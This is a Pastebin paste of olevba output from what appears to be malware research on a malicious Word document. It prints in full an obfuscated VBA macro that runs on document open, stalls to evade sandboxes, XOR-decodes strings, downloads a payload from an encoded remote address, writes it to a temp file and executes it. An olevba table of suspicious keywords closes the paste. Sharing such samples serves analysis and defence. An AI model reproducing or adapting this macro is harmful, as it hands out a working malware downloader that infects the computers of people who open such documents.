API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Nov 26th, 2015
365
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 18.75 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MAS-HB-V malware.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: malware.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: malware.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. #If VBA7 Then
  16. Private Declare PtrSafe Function FiOhvKV5yT Lib "Lkt6o8pmvGrNO" Alias "PWYEuuBiV" (ByVal InHWN3QclIE As String, JHaob5RaBb0pUW As Long) As Long
  17. #Else
  18. Private Declare Function FiOhvKV5yT lib "Lkt6o8pmvGrNO" Alias "PWYEuuBiV"(byval InHWN3QclIE as String, JHaob5RaBb0pUW as Long ) as Long
  19. #End If
  20. Private GpkKWN3 As String
  21. Function N850BCurHo(ByVal LemiyA6QZnuCYC As String, XUn6QwHKyAv As String) As String
  22. PevSFR3rv0e2RZK = 39
  23. If PevSFR3rv0e2RZK + MJDM0hu5rU7Tdb > 1 Then
  24. MJDM0hu5rU7Tdb = 1 + 18
  25. '19 Clra 16 25
  26. End If
  27. MJDM0hu5rU7Tdb = 69
  28. '82 96 55 EHgu
  29. On Error Resume Next
  30. SQoiCuInevSFR3rv0 = 82
  31. If SQoiCuInevSFR3rv0 + NsNJTqkk3w > 1 Then
  32. NsNJTqkk3w = 72 + 29
  33. '32 GvriOI9 94 34
  34. End If
  35. NsNJTqkk3w = 44
  36. '59 39 1 HSHSe4Iv
  37. Dim GJE0Xk() As Byte, Uu3ahNk9NV(0 To 285) As Integer, CtAp9AJ0lBLNg() As Byte, NyTk5LjHttv, Hboyl0jeJwPSe, L7j2iquXfw8f, HlgcUkRQ3VZtHDYq, L8aV9L4vUWh As Boolean
  38. It9Acrpc7M = 30
  39. If It9Acrpc7M + DrjiAY5ezWAm > 1 Then
  40. DrjiAY5ezWAm = 53 + 31
  41. '26 RCZpY 14 49
  42. End If
  43. DrjiAY5ezWAm = 44
  44. '87 56 76 HPqsPooeMN9zRPs3
  45. GJE0Xk = StrConv(LemiyA6QZnuCYC, (64 + 1 + 64 - 1))
  46. VwkYpXxUG = 28
  47. If VwkYpXxUG + L7MtzHaiOhvKV > 1 Then
  48. L7MtzHaiOhvKV = 60 + 12
  49. '10 HbZCtRcd4hpmvGrNO 41 22
  50. End If
  51. L7MtzHaiOhvKV = 27
  52. '11 59 15 IlWZ1yGPfpiG
  53. CtAp9AJ0lBLNg() = StrConv(XUn6QwHKyAv, (64 + 5 + 64 - 5))
  54. C1aZX3huwbllRm = 94
  55. If C1aZX3huwbllRm + Orcx0psolAwdff4 > 1 Then
  56. Orcx0psolAwdff4 = 49 + 58
  57. '84 SgJEI38zx 78 45
  58. End If
  59. Orcx0psolAwdff4 = 71
  60. '20 20 72 TmV0hQRiff
  61. Hboyl0jeJwPSe = UBound(CtAp9AJ0lBLNg)
  62. FXBI0cjkxDlMD = 32
  63. If FXBI0cjkxDlMD + CJqQ7WXZNbh3E > 1 Then
  64. CJqQ7WXZNbh3E = 10 + 5
  65. '92 Fh3vFSWMRoJaMPe 28 22
  66. End If
  67. CJqQ7WXZNbh3E = 66
  68. '8 55 66 TytC1onRx
  69. For NyTk5LjHttv = 0 To (127.5 + 7 + 127.5 - 7)
  70. Uu3ahNk9NV(NyTk5LjHttv) = NyTk5LjHttv
  71. Next NyTk5LjHttv
  72. For NyTk5LjHttv = (128 + 2 + 128 - 2) To (142.5 + 2 + 142.5 - 2)
  73. Uu3ahNk9NV(NyTk5LjHttv) = NyTk5LjHttv Xor (128 + 7 + 128 - 7)
  74. Next NyTk5LjHttv
  75. For NyTk5LjHttv = 1 To (3 + 8 + 3 - 8)
  76. Uu3ahNk9NV(NyTk5LjHttv + (124.5 + 1 + 124.5 - 1)) = CtAp9AJ0lBLNg(Hboyl0jeJwPSe - NyTk5LjHttv)
  77. Uu3ahNk9NV(NyTk5LjHttv - 1) = CtAp9AJ0lBLNg(NyTk5LjHttv - 1) Xor ((127.5 + 6 + 127.5 - 6) - CtAp9AJ0lBLNg(Hboyl0jeJwPSe - NyTk5LjHttv))
  78. Next NyTk5LjHttv
  79. L8aV9L4vUWh = False
  80. L7j2iquXfw8f = 0
  81. HlgcUkRQ3VZtHDYq = 0
  82. For NyTk5LjHttv = 0 To UBound(GJE0Xk)
  83. If L7j2iquXfw8f > Hboyl0jeJwPSe Then L7j2iquXfw8f = 0
  84. If HlgcUkRQ3VZtHDYq > (142.5 + 6 + 142.5 - 6) And L8aV9L4vUWh = False Then HlgcUkRQ3VZtHDYq = 0: L8aV9L4vUWh = Not (L8aV9L4vUWh)
  85. If HlgcUkRQ3VZtHDYq > (142.5 + 1 + 142.5 - 1) And L8aV9L4vUWh = True Then HlgcUkRQ3VZtHDYq = (2.5 + 4 + 2.5 - 4): L8aV9L4vUWh = Not (L8aV9L4vUWh)
  86. GJE0Xk(NyTk5LjHttv) = (GJE0Xk(NyTk5LjHttv) Xor (Uu3ahNk9NV(HlgcUkRQ3VZtHDYq) Xor CtAp9AJ0lBLNg(L7j2iquXfw8f)))
  87. L7j2iquXfw8f = L7j2iquXfw8f + 1
  88. HlgcUkRQ3VZtHDYq = HlgcUkRQ3VZtHDYq + 1
  89. Next NyTk5LjHttv
  90. WuyDMqJlc9EExGn = 95
  91. If WuyDMqJlc9EExGn + MD6vOtbeXg08Apf > 1 Then
  92. MD6vOtbeXg08Apf = 46 + 67
  93. '56 FRKdQgv8nI4s 91 59
  94. End If
  95. MD6vOtbeXg08Apf = 3
  96. '71 91 4 Dr9gJTFhJbaTyvr
  97. N850BCurHo = StrConv(GJE0Xk(), (32 + 6 + 32 - 6))
  98. PQtmFj4 = 59
  99. If PQtmFj4 + Jy5AeFk8EPh5 > 1 Then
  100. Jy5AeFk8EPh5 = 81 + 87
  101. '16 Y28Ireu 57 60
  102. End If
  103. Jy5AeFk8EPh5 = 78
  104. '97 87 44 QSITYPlOzd9wZo5wK
  105. End Function
  106. Sub Document_Open()
  107. Y8zxt6Msdpa = 73
  108. If Y8zxt6Msdpa + IffQgv8nI4s > 1 Then
  109. IffQgv8nI4s = 85 + 23
  110. '38 NlQBbSx8CvjG5n 18 78
  111. End If
  112. IffQgv8nI4s = 69
  113. '70 67 77 SK2Okf9
  114. On Error Resume Next
  115. PKaAwdff4 = 59
  116. If PKaAwdff4 + UGTAOx > 1 Then
  117. UGTAOx = 3 + 71
  118. '91 BpX8trlI24f 4 95
  119. End If
  120. UGTAOx = 18
  121. '51 79 94 Seuq3p2oT0
  122. Dim DrqjA As Long, YsFjPuyG As Long, YhNAv As Long, V6cC3scUY4zddH99R As Long
  123. Pn2j04QQZ = 39
  124. If Pn2j04QQZ + PhB4lG17FG95 > 1 Then
  125. PhB4lG17FG95 = 15 + 88
  126. '41 WCYB5Gg 83 81
  127. End If
  128. PhB4lG17FG95 = 35
  129. '33 6 14 T85wPN55plLSy
  130. DrqjA = 97933779: YsFjPuyG = 0: YhNAv = 0
  131. A9brznS9 = 39
  132. If A9brznS9 + NZmCtQE > 1 Then
  133. NZmCtQE = 3 + 59
  134. '89 Gn0vbN 52 64
  135. End If
  136. NZmCtQE = 1
  137. '17 96 57 WjrO2i
  138. For YsFjPuyG = 1 To DrqjA
  139. YhNAv = YhNAv + 1
  140. Next YsFjPuyG
  141. SC5Gsa2L8x9 = 53
  142. If SC5Gsa2L8x9 + YQfGqOLqlO > 1 Then
  143. YQfGqOLqlO = 61 + 11
  144. '61 C5Ml9aEwx 82 71
  145. End If
  146. YQfGqOLqlO = 7
  147. '1 44 86 JbPkJ1m84n
  148. If YhNAv = DrqjA Then
  149. MBLZvB3itxy = 28
  150. If MBLZvB3itxy + VGYVXAeUo > 1 Then
  151. VGYVXAeUo = 10 + 37
  152. '56 OwEp3rMGmB 24 23
  153. End If
  154. VGYVXAeUo = 98
  155. '98 51 67 YfcNwjt
  156. Dim JdQXv As Integer, Glu As String
  157. For JdQXv = 6 To 931
  158. Glu = Glu + JdQXv
  159. Next
  160. QMC2wbN5Ml9a = 30
  161. If QMC2wbN5Ml9a + JLJBTPQC0v8nPRi > 1 Then
  162. JLJBTPQC0v8nPRi = 75 + 66
  163. '23 H1FnrBinFMXuiTr7q 26 88
  164. End If
  165. JLJBTPQC0v8nPRi = 27
  166. '38 53 33 MommQAvjlo
  167. V6cC3scUY4zddH99R = FiOhvKV5yT("Woslk2fer8", 13)
  168. NEVW = 27
  169. If NEVW + AbNNqkZ7MBaO > 1 Then
  170. AbNNqkZ7MBaO = 85 + 37
  171. '9 TkPX49TibqGBJxshx 40 47
  172. End If
  173. AbNNqkZ7MBaO = 52
  174. '36 84 40 PATiSzZ0SHp
  175. If Err.Number = (26.5 + 1 + 26.5 - 1) Then
  176. ALJBTPQC0v8nPRi = 63
  177. If ALJBTPQC0v8nPRi + OgAQFxX3NoRJzF0 > 1 Then
  178. OgAQFxX3NoRJzF0 = 76 + 90
  179. '49 Bdt9CAhqI 73 72
  180. End If
  181. OgAQFxX3NoRJzF0 = 4
  182. '11 16 48 TaXuqpe9brzn
  183. Err.Clear
  184. GdnAtw6pW2Ddd = 21
  185. If GdnAtw6pW2Ddd + Bn4b3DBA1 > 1 Then
  186. Bn4b3DBA1 = 57 + 95
  187. '33 LntwxxRUQfG 22 2
  188. End If
  189. Bn4b3DBA1 = 62
  190. '79 80 77 UWnIyleBDeMMQkBoa
  191. GpkKWN3 = NQfyvvczlB
  192. DFx2CkP6uLciomp = 15
  193. If DFx2CkP6uLciomp + YxN3SKC7rbd4Y0 > 1 Then
  194. YxN3SKC7rbd4Y0 = 37 + 69
  195. '98 HPrpdzlNL 13 16
  196. End If
  197. YxN3SKC7rbd4Y0 = 34
  198. '79 69 26 G1kJpKeLjvHFTRm
  199. Yo0cZy9rsLWc833
  200. Else
  201. Cfh6QC = 1
  202. If Cfh6QC + SahItA7q > 1 Then
  203. SahItA7q = 51 + 28
  204. '23 HCOoCyyztc 12 46
  205. End If
  206. SahItA7q = 41
  207. '84 27 74 Ktvz0LH4pnr
  208. PGYDqcNIiY
  209. CVrJQakokY = 20
  210. If CVrJQakokY + Y3Eih8b7DEsD5mvG > 1 Then
  211. Y3Eih8b7DEsD5mvG = 49 + 34
  212. '4 ILogRYp5sBH4wIB 69 73
  213. End If
  214. Y3Eih8b7DEsD5mvG = 13
  215. '68 76 4 PMgXukJXdidChXD
  216. End If
  217. GD8V9NxlguCc = 31
  218. If GD8V9NxlguCc + Cbj3Mm1 > 1 Then
  219. Cbj3Mm1 = 14 + 40
  220. '60 Re2uopTYl 27 26
  221. End If
  222. Cbj3Mm1 = 2
  223. '75 28 70 PYPrON7WK2JzAOBM
  224. Else
  225. SkzzbsvfSyz = 30
  226. If SkzzbsvfSyz + OKqrI > 1 Then
  227. OKqrI = 17 + 31
  228. '88 Kj3Mm1XX0vAd4 14 13
  229. End If
  230. OKqrI = 43
  231. '50 56 40 HViUsnLUZHz
  232. PGYDqcNIiY
  233. OEjP2fwXjVZgphAd = 48
  234. If OEjP2fwXjVZgphAd + O216Y38Y2IQM > 1 Then
  235. O216Y38Y2IQM = 50 + 91
  236. '94 PGa6IxNKb0 13 58
  237. End If
  238. O216Y38Y2IQM = 21
  239. '77 8 70 Yn2V1Js3WRXItf4P
  240. End If
  241. B1bVxGQc8 = 31
  242. If B1bVxGQc8 + CHKnEMtktO > 1 Then
  243. CHKnEMtktO = 49 + 94
  244. '84 Vcn9fY7O 41 45
  245. End If
  246. CHKnEMtktO = 8
  247. '46 56 72 J375rwVno
  248. End Sub
  249. Sub B12q0RLAU(YAz6wXfrk6f5dv As String, Dz1TOyYXiEI9X1 As String)
  250. Dim Pp3rrlsgf94PVXP6U As Object
  251. VjnPC7wODO4Jx = 68
  252. If VjnPC7wODO4Jx + Rqk3uXtteGEZk > 1 Then
  253. Rqk3uXtteGEZk = 89 + 1
  254. '93 FhOzcnGer 16 48
  255. End If
  256. Rqk3uXtteGEZk = 50
  257. '91 94 13 SgNKb0
  258. Set Pp3rrlsgf94PVXP6U = CreateObject(N850BCurHo(Chr$(245) + Chr$(206) + Chr$(216) + Chr$(207) + Chr$(245) + Chr$(178) + Chr$(58) + Chr$(59) + Chr$(54) + Chr$(78) + Chr$(14) + Chr$(32) + Chr$(52) + Chr$(81) + Chr$(39) + Chr$(47) + Chr$(54) + Chr$(55) + Chr$(46) + Chr$(23) + Chr$(25) + Chr$(53) + Chr$(40) + Chr$(75) + Chr$(1) + Chr$(52), "BBT9zYURYi"))
  259. Oy07ZXh375rw = 66
  260. If Oy07ZXh375rw + IafTt7I6 > 1 Then
  261. IafTt7I6 = 95 + 81
  262. '51 IPwAQevkxJXOs 16 21
  263. End If
  264. IafTt7I6 = 60
  265. '15 24 50 KL1NNvX9M
  266. With Pp3rrlsgf94PVXP6U.CREATEtEXTFILe(YAz6wXfrk6f5dv)
  267. FnGerJrNK5Me = 59
  268. If FnGerJrNK5Me + D7E2ALYP > 1 Then
  269. D7E2ALYP = 18 + 87
  270. '79 MHSxliGq 57 96
  271. End If
  272. D7E2ALYP = 78
  273. '60 87 7 RwchV
  274. .WRiTE (Dz1TOyYXiEI9X1)
  275. WKjDoHr5iKzkpVwg2 = 72
  276. If WKjDoHr5iKzkpVwg2 + QcB20uYVs9TKjI > 1 Then
  277. QcB20uYVs9TKjI = 24 + 23
  278. '53 T86tdYttAG8H2 34 39
  279. End If
  280. QcB20uYVs9TKjI = 24
  281. '71 27 86 HZonet6216Y38Y2I
  282. .Close
  283. JFqOLICehY = 88
  284. If JFqOLICehY + H5Gi4s6Oh > 1 Then
  285. H5Gi4s6Oh = 28 + 83
  286. '91 YfJW0b1SpgJJ 19 39
  287. End If
  288. H5Gi4s6Oh = 79
  289. '5 80 54 R2EarR9dQ6
  290. End With
  291. Bhv4rFyKDKXTO = 95
  292. If Bhv4rFyKDKXTO + KKSWCkv > 1 Then
  293. KKSWCkv = 96 + 38
  294. '41 T61Q0H4n2uSis 59 5
  295. End If
  296. KKSWCkv = 68
  297. '25 55 18 Qcwh3Dw
  298. Set Pp3rrlsgf94PVXP6U = Nothing
  299. RyXDLrCTEUdfgw = 27
  300. If RyXDLrCTEUdfgw + UUTkQyfMsfxt > 1 Then
  301. UUTkQyfMsfxt = 76 + 27
  302. '48 TkQyfMsf 37 72
  303. End If
  304. UUTkQyfMsfxt = 66
  305. '10 52 84 VFnmj
  306. End Sub
  307. Sub AzGSEXj0198(YgWPvZP1GI6MAx6 As Long)
  308. EvGXxSr = 14
  309. If EvGXxSr + MwNvccke53sI > 1 Then
  310. MwNvccke53sI = 15 + 12
  311. '21 X9w2oS3F 92 78
  312. End If
  313. MwNvccke53sI = 92
  314. '51 3 74 NYr9z
  315. Dim HTvFxkntQn7 As Long
  316. Wsu2EarR9dQ = 17
  317. If Wsu2EarR9dQ + CvU49QGChAHz2YU > 1 Then
  318. CvU49QGChAHz2YU = 77 + 24
  319. '58 C1MjOEfC3K7tGTTZ 8 58
  320. End If
  321. CvU49QGChAHz2YU = 80
  322. '68 4 71 QinpPH
  323. HTvFxkntQn7 = Timer + YgWPvZP1GI6MAx6
  324. Do While Timer < HTvFxkntQn7
  325. DoEvents
  326. Loop
  327. P26QLde5nGzV = 25
  328. If P26QLde5nGzV + Ab4PHJ9i3Pqz > 1 Then
  329. Ab4PHJ9i3Pqz = 8 + 34
  330. '54 C3bLu3db 21 20
  331. End If
  332. Ab4PHJ9i3Pqz = 95
  333. '69 22 64 IxyptdjM
  334. End Sub
  335. Sub Yo0cZy9rsLWc833()
  336. HtdjMDb8fByV = 35
  337. If HtdjMDb8fByV + PgGhGyO1BQj > 1 Then
  338. PgGhGyO1BQj = 38 + 1
  339. '40 QUJFvPh2RB8 50 66
  340. End If
  341. PgGhGyO1BQj = 45
  342. '7 24 25 EpUcR3zs
  343. Dim G5UczWAvCd8 As String, Jy6OeQYzbkLfj4 As Object
  344. IBDicnTaoZ = 62
  345. If IBDicnTaoZ + SCrQim0cZ3bLu3d > 1 Then
  346. SCrQim0cZ3bLu3d = 83 + 94
  347. '86 BbDpG 10 42
  348. End If
  349. SCrQim0cZ3bLu3d = 44
  350. '85 87 6 Tee9PKR9nm
  351. G5UczWAvCd8 = Environ(N850BCurHo(Chr$(207) + Chr$(227) + Chr$(223) + Chr$(162) + Chr$(241) + Chr$(189) + Chr$(81), "INw1nf6o9PlQb")) & N850BCurHo(Chr$(231) + Chr$(236) + Chr$(254) + Chr$(248) + Chr$(214) + Chr$(130) + Chr$(19) + Chr$(62) + Chr$(5) + Chr$(27) + Chr$(41) + Chr$(40) + Chr$(85) + Chr$(71) + Chr$(55) + Chr$(16) + Chr$(43) + Chr$(16), "Jl3XOXwRJDj") & GpkKWN3 & N850BCurHo(Chr$(128) + Chr$(203) + Chr$(215) + Chr$(211), "YTfXIPQQT")
  352. SDKtuw = 90
  353. If SDKtuw + P9MZ56WLHCqol > 1 Then
  354. P9MZ56WLHCqol = 62 + 74
  355. '88 FKO 21 72
  356. End If
  357. P9MZ56WLHCqol = 70
  358. '2 82 87 X6sACIZZnE1Gh8
  359. Set Jy6OeQYzbkLfj4 = CreateObject(N850BCurHo(Chr$(193) + Chr$(211) + Chr$(241) + Chr$(215) + Chr$(218) + Chr$(205) + Chr$(58) + Chr$(32) + Chr$(54) + Chr$(125) + Chr$(63) + Chr$(3) + Chr$(51) + Chr$(22) + Chr$(27) + Chr$(17) + Chr$(26), "AJZmEsS"))
  360. Hpwu6Bl = 72
  361. If Hpwu6Bl + YeBQPr1wAvqimGhpX > 1 Then
  362. YeBQPr1wAvqimGhpX = 95 + 2
  363. '30 HCXroKyiQXE3xbOh 71 73
  364. End If
  365. YeBQPr1wAvqimGhpX = 91
  366. '11 1 57 VbiBYEmq
  367. Jy6OeQYzbkLfj4.Open N850BCurHo(Chr$(193) + Chr$(232) + Chr$(243), "Bm1NBcQZfBt9jXRy3"), N850BCurHo(Chr$(246) + Chr$(192) + Chr$(199) + Chr$(186) + Chr$(137) + Chr$(191) + Chr$(101) + Chr$(36) + Chr$(8) + Chr$(10) + Chr$(47) + Chr$(34) + Chr$(42) + Chr$(16) + Chr$(52) + Chr$(83) + Chr$(57) + Chr$(45) + Chr$(29) + Chr$(14) + Chr$(125) + Chr$(48) + Chr$(36) + Chr$(87) + Chr$(62) + Chr$(67) + Chr$(120) + Chr$(58) + Chr$(13) + Chr$(11) + Chr$(102), "GFSoL5LKaq") & NQfyvvczlB, 0
  368. Ofj = 9
  369. If Ofj + W5u9qigla6 > 1 Then
  370. W5u9qigla6 = 59 + 81
  371. '69 U7QtWvY42JwDW 5 72
  372. End If
  373. W5u9qigla6 = 16
  374. '84 6 17 QdLhShR
  375. Jy6OeQYzbkLfj4.seND
  376. If Jy6OeQYzbkLfj4.Status = (100 + 8 + 100 - 8) Then
  377. P92RvX1OyI = 77
  378. If P92RvX1OyI + Tlpy4pOJB > 1 Then
  379. Tlpy4pOJB = 1 + 33
  380. '61 AGoCC 3 78
  381. End If
  382. Tlpy4pOJB = 96
  383. '42 33 89 Bu3P6
  384. GoTo KNCjFjtSsUu5k
  385. H0oXKiA6m = 76
  386. If H0oXKiA6m + XCPhIXE1Gh8 > 1 Then
  387. XCPhIXE1Gh8 = 4 + 23
  388. '90 HiJtOsluH 89 65
  389. End If
  390. XCPhIXE1Gh8 = 65
  391. '18 34 58 TOzDi3HsPBkL8
  392. Else
  393. AE7aUiUy1UeC = 8
  394. If AE7aUiUy1UeC + JkwSoTVijR3AJ > 1 Then
  395. JkwSoTVijR3AJ = 25 + 26
  396. '23 HXRWM 32 77
  397. End If
  398. JkwSoTVijR3AJ = 90
  399. '4 62 87 EeVp
  400. Jy6OeQYzbkLfj4.Open N850BCurHo(Chr$(252) + Chr$(251) + Chr$(222), "UgAiwo1aaBuAD6"), N850BCurHo(Chr$(213) + Chr$(191) + Chr$(198) + Chr$(254) + Chr$(188) + Chr$(129) + Chr$(31) + Chr$(49) + Chr$(30) + Chr$(30) + Chr$(46) + Chr$(76) + Chr$(38) + Chr$(73) + Chr$(58) + Chr$(2) + Chr$(0) + Chr$(53) + Chr$(74) + Chr$(127) + Chr$(65) + Chr$(43) + Chr$(2) + Chr$(73) + Chr$(63) + Chr$(66) + Chr$(118) + Chr$(71) + Chr$(61) + Chr$(3) + Chr$(80), "QyqM4B6") & NQfyvvczlB, 0
  401. Cuo52olTIbaOgrZ = 94
  402. If Cuo52olTIbaOgrZ + GWaauGfzntoPg1G > 1 Then
  403. GWaauGfzntoPg1G = 63 + 84
  404. '95 TNk2R 87 11
  405. End If
  406. GWaauGfzntoPg1G = 43
  407. '45 86 89 IGdAaRv6BeMop0Yaa
  408. Jy6OeQYzbkLfj4.seND
  409. KDEkUqsxrgrl = 9
  410. If KDEkUqsxrgrl + NKenP > 1 Then
  411. NKenP = 49 + 26
  412. '44 Mj3bKHSNEWmeIz 89 79
  413. End If
  414. NKenP = 36
  415. '40 3 41 YY5zn3cWqt5
  416. If Jy6OeQYzbkLfj4.Status = (100 + 3 + 100 - 3) Then
  417. NpvGZ5rgZCRTUq = 61
  418. If NpvGZ5rgZCRTUq + QLq6CSMT43j > 1 Then
  419. QLq6CSMT43j = 38 + 33
  420. '22 Q3G7TIMG 57 51
  421. End If
  422. QLq6CSMT43j = 94
  423. '63 84 95 LLcyM2peGdAaRv6
  424. GoTo KNCjFjtSsUu5k
  425. VKk7tqLDBK = 93
  426. If VKk7tqLDBK + NMYJ7d > 1 Then
  427. NMYJ7d = 66 + 74
  428. '24 Uf3dQjvfSG 74 96
  429. End If
  430. NMYJ7d = 84
  431. '20 14 58 DMan98xPTEU
  432. End If
  433. SdBIZAZSNSJfKpj = 52
  434. If SdBIZAZSNSJfKpj + GKdU3l > 1 Then
  435. GKdU3l = 6 + 44
  436. '4 Uv4zBtOced 50 84
  437. End If
  438. GKdU3l = 8
  439. '85 80 68 DuZIfom1Aeq1A
  440. End If
  441. Rr4tm1pHovm = 22
  442. If Rr4tm1pHovm + OOkRBHQv2V > 1 Then
  443. OOkRBHQv2V = 95 + 48
  444. '91 TRENEsFLooSq 88 43
  445. End If
  446. OOkRBHQv2V = 7
  447. '41 14 22 PpmSWyrtSkqQ
  448. Exit Sub
  449. TLNBz3utPpNHz3 = 97
  450. If TLNBz3utPpNHz3 + YAPZSY4KGk8Mmi > 1 Then
  451. YAPZSY4KGk8Mmi = 17 + 84
  452. '83 D0QxudBKVKW 59 59
  453. End If
  454. YAPZSY4KGk8Mmi = 12
  455. '28 52 6 GKxbCDNIqKCpcq
  456. KNCjFjtSsUu5k:
  457. RLbJpjLUKSC17r = 22
  458. If RLbJpjLUKSC17r + VqWASNqmC4f3jp > 1 Then
  459. VqWASNqmC4f3jp = 95 + 48
  460. '91 PfamB 88 43
  461. End If
  462. VqWASNqmC4f3jp = 7
  463. '41 14 22 OFE
  464. AzGSEXj0198 (1 + 9 + 1 - 9)
  465. AC6Seuk = 41
  466. If AC6Seuk + GqPWcAOvvXX > 1 Then
  467. GqPWcAOvvXX = 26 + 19
  468. '41 CQLLEMenC 73 2
  469. End If
  470. GqPWcAOvvXX = 43
  471. '20 38 83 DofpgnNPhc
  472. B12q0RLAU G5UczWAvCd8, N850BCurHo(StrConv(Jy6OeQYzbkLfj4.resPOnSeBodY, (32 + 3 + 32 - 3)), N850BCurHo(Chr$(211) + Chr$(235) + Chr$(202) + Chr$(160) + Chr$(216) + Chr$(249) + Chr$(112) + Chr$(89) + Chr$(15) + Chr$(111) + Chr$(86), "MWwoL0A7qSjF"))
  473. O5V6ScwVCAZ = 27
  474. If O5V6ScwVCAZ + PXxhQZeju > 1 Then
  475. PXxhQZeju = 15 + 50
  476. '45 IngzthtttId 88 57
  477. End If
  478. PXxhQZeju = 77
  479. '89 81 4 KHzH6kuqC0TL80
  480. CreateObject(N850BCurHo(Chr$(251) + Chr$(229) + Chr$(196) + Chr$(204) + Chr$(220) + Chr$(252) + Chr$(32) + Chr$(88) + Chr$(26) + Chr$(39) + Chr$(28) + Chr$(45) + Chr$(33), "HFEg5mRqAFsJAXISn")).Run """" & G5UczWAvCd8 & """"
  481. RDyJ7Y = 52
  482. If RDyJ7Y + HukbQ > 1 Then
  483. HukbQ = 93 + 41
  484. '26 EM6EP9G1 19 41
  485. End If
  486. HukbQ = 73
  487. '2 43 20 HErA9V4SK2W
  488. Set Jy6OeQYzbkLfj4 = Nothing
  489. End Sub
  490. Sub PGYDqcNIiY()
  491. FSytexzdRD = 9
  492. If FSytexzdRD + BIds252 > 1 Then
  493. BIds252 = 24 + 4
  494. '64 M9kCIWJkz39tjuedSsx 55 56
  495. End If
  496. BIds252 = 53
  497. '63 34 21 WJkz39tjuedS
  498. TimeValue 77
  499. OZymfbItYx = UCase(6)
  500. YIMdX5LppqEnQYKt = QBColor(20)
  501. SHIpR8r0U6XL = CurDir
  502. Hour 23
  503. IN1K98kRLjtt6n3hA = Dir("VVdgLL8J8GsT50BFu")
  504. If CByte(41) = True Then FOtBdLFOEImukpB = 8676
  505. NPer 33, 37, 12
  506. Rate 48, 64, 44
  507. Command
  508. Month 5
  509. Rnd
  510. AppActivate 95
  511. Load BgtwAmm
  512. Tan 96
  513. Err.Raise 93
  514. Sqr 3
  515. If CDbl(74) = True Then Hy485SM = 87
  516. DDB 2, 33, 84, 83
  517. Year 14
  518. DateAdd "IE7XitPAb4xP", 94, 83
  519. Weekday 32
  520. JjNFS = Day(87)
  521. Loc 47
  522. IGe6BI0fWwS = Cos(10)
  523. ChDir 43
  524. Second 8
  525. IMVlVpey78hH6 = CVDate(85)
  526. ChDrive 26
  527. Err.Clear
  528. G04GvszyHcz7cUz = 59
  529. If G04GvszyHcz7cUz + EG1gFhqZ > 1 Then
  530. EG1gFhqZ = 57 + 88
  531. '95 RvBGuX 1 85
  532. End If
  533. EG1gFhqZ = 33
  534. '62 48 18 GpCqyVrr
  535. End Sub
  536. Function NQfyvvczlB() As String
  537. YJIxHpJTHPyKYz = 94
  538. If YJIxHpJTHPyKYz + CAwmLM > 1 Then
  539. CAwmLM = 25 + 32
  540. '38 KEALS7PCSeJF8XbJ 22 69
  541. End If
  542. CAwmLM = 26
  543. '84 54 46 XCUmU
  544. Dim KHK50vUSWRXp As Long
  545. Rvwe6AD2e2R2 = 81
  546. If Rvwe6AD2e2R2 + Q8eCMd1 > 1 Then
  547. Q8eCMd1 = 6 + 5
  548. '36 J1m983Xb0Ro 43 48
  549. End If
  550. Q8eCMd1 = 32
  551. '80 9 94 PxfC3IiEmZ
  552. KBTQl75TBRxS:
  553. Hz9biQhNoy = 22
  554. If Hz9biQhNoy + UE8BFCtLq3pdRI > 1 Then
  555. UE8BFCtLq3pdRI = 84 + 96
  556. '33 QhNoy 49 29
  557. End If
  558. UE8BFCtLq3pdRI = 89
  559. '80 81 78 IHPSHJLrgQCWdpaQ0
  560. Randomize
  561. MAvFduSXDsQzeGbCs = 62
  562. If MAvFduSXDsQzeGbCs + Rf9cavtzvtaGn8 > 1 Then
  563. Rf9cavtzvtaGn8 = 8 + 97
  564. '55 VB4TDZNH6xVvAx 58 21
  565. End If
  566. Rf9cavtzvtaGn8 = 59
  567. '70 85 65 PhrAJP4Z5
  568. KHK50vUSWRXp = Int((4999.5 + 5 + 4999.5 - 5) * Rnd)
  569. EW1hJ0wrkq9c = 44
  570. If EW1hJ0wrkq9c + J9KlHAPO6Be > 1 Then
  571. J9KlHAPO6Be = 78 + 73
  572. '17 O9YtO 59 7
  573. End If
  574. J9KlHAPO6Be = 18
  575. '10 33 39 Q7pMOMRcYyZHZd
  576. If KHK50vUSWRXp < (49.5 + 6 + 49.5 - 6) Then GoTo KBTQl75TBRxS
  577. N7hDrZw3PV = 12
  578. If N7hDrZw3PV + L14gSB4TDZNH > 1 Then
  579. L14gSB4TDZNH = 2 + 58
  580. '62 A6xVvAxgzJqDs 25 37
  581. End If
  582. L14gSB4TDZNH = 73
  583. '89 69 30 HaAooKzRxBoNXCkkC
  584. NQfyvvczlB = KHK50vUSWRXp
  585. V0CqzFv63ukddr = 61
  586. If V0CqzFv63ukddr + Ca1OA > 1 Then
  587. Ca1OA = 37 + 26
  588. '6 Pfmhh9O5qs4y 66 83
  589. End If
  590. Ca1OA = 84
  591. '81 91 62 KL8QYMjG9cmlo
  592. End Function
  593.  
  594. +------------+----------------------+-----------------------------------------+
  595. | Type       | Keyword              | Description                             |
  596. +------------+----------------------+-----------------------------------------+
  597. | AutoExec   | Document_Open        | Runs when the Word document is opened   |
  598. | Suspicious | Open                 | May open a file                         |
  599. | Suspicious | Run                  | May run an executable file or a system  |
  600. |            |                      | command                                 |
  601. | Suspicious | CreateObject         | May create an OLE object                |
  602. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  603. |            |                      | strings                                 |
  604. | Suspicious | Xor                  | May attempt to obfuscate specific       |
  605. |            |                      | strings                                 |
  606. | Suspicious | CreateTextFile       | May create a text file                  |
  607. | Suspicious | Environ              | May read system environment variables   |
  608. | Suspicious | Write                | May write to a file (if combined with   |
  609. |            |                      | Open)                                   |
  610. | Suspicious | AppActivate          | May control another application by      |
  611. |            |                      | simulating user keystrokes              |
